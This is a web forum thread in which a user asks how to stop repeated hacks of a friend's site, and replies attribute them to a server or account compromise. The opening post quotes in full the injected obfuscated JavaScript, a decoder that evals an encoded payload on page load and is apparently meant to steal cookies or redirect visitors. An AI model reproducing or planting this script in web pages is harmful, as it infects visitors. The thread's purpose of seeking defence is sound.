Results 1 to 7 of 7

Thread: Getting hacks everyday

  1. #1
    Join Date
    Jul 2007
    Location
    Azerbaijan, Baku
    Posts
    144
    Thanks
    11
    Thanked 27 Times in 25 Posts

    Angry Getting hacks everyday

    One of my friend's site getting hacks everyday. Someone adds this:

    <script language=JavaScript>function jban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,43,42,27,7,60,12,11,20,14,0,0,0,0,0,0,59,18,48,30,44,0,51,50,21,53,22,37,38,40,2,1,39,45,47,9,36,6,33,10,54,16,17 ,0,0,0,0,61,0,62,13,49,24,3,26,25,56,55,58,29,35,52,4,23,31,5,19,34,15,46,41,8,28,32,57);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(179^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}jban('n1kioFbckN5cApDcE@wKiFkiJrSsoFbmU@QIkpxPn4DX43_L8aMXH4DmC3_Tk7QiJ@dVEAdVrNxBY@dT3p5cePwPxNhBfrbBk2kiHFbP4FSl8sv0Ap5XkU6iUi_I3jRm4R kPO7kioFQi32gLNfhVn9MLdAgVEAdV8sSKZ9Scfp_c3@dyOWhT33QX8R_c9AhyrN5cW0QI9UzIfe5Bp7QGSXbik3kTbawPfokBA@QIbAvL')</script>

    How to defend??

  2. #2
    Join Date
    Mar 2006
    Location
    Illinois, USA
    Posts
    12,164
    Thanks
    265
    Thanked 690 Times in 678 Posts

    Default

    Does make any difference what is being done once hacked-- what matters is how his site is being accessed. Can't really help you there without more information.
    Daniel - Freelance Web Design | <?php?> | <html>| español | Deutsch | italiano | português | català | un peu de français | some knowledge of several other languages: I can sometimes help translate here on DD | Linguistics Forum

  3. #3
    Join Date
    Jul 2007
    Location
    Azerbaijan, Baku
    Posts
    144
    Thanks
    11
    Thanked 27 Times in 25 Posts

    Default

    This is his site.

    Antivirus detected virus.

    Same things in all sites in one hosting.

  4. #4
    Join Date
    Aug 2004
    Posts
    10,143
    Thanks
    3
    Thanked 1,008 Times in 993 Posts
    Blog Entries
    16

    Default

    Get your friend to contact his host asap about the breach. This isn't a JavaScript issue per say, but a server compromise that has allowed the hacker to inject arbitrary HTML onto his site pages. In this case, the HTML is in itself a vicious JavaScript code probably meant to steal cookie information or redirect users to another site, but it could easily have been just an offensive image instead. The point is, your friend's server has been compromised, and can only be fixed by someone with access to the server.

  5. The Following User Says Thank You to ddadmin For This Useful Post:

    allahverdi (06-19-2008)

  6. #5
    Join Date
    Jul 2006
    Location
    just north of Boston, MA
    Posts
    1,806
    Thanks
    13
    Thanked 72 Times in 72 Posts

    Default

    what ddadmin said is probably correct, however this could also be a password issue?

    did your friend change his "cpanel" and/or ftp password? if yes and this is still happening, then it is the server itself that's being breached and not just his account

  7. #6
    Join Date
    Jul 2007
    Location
    Azerbaijan, Baku
    Posts
    144
    Thanks
    11
    Thanked 27 Times in 25 Posts

    Default

    Quote Originally Posted by boogyman View Post
    what ddadmin said is probably correct, however this could also be a password issue?

    did your friend change his "cpanel" and/or ftp password? if yes and this is still happening, then it is the server itself that's being breached and not just his account
    Yes he changed.

    And other accounts got same too...

    Thanks ddadmin

  8. #7
    Join Date
    Mar 2008
    Posts
    122
    Thanks
    17
    Thanked 5 Times in 5 Posts

    Default

    omg, i had my scanner turned off and i foolishly went on the link, is my pc infected????

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •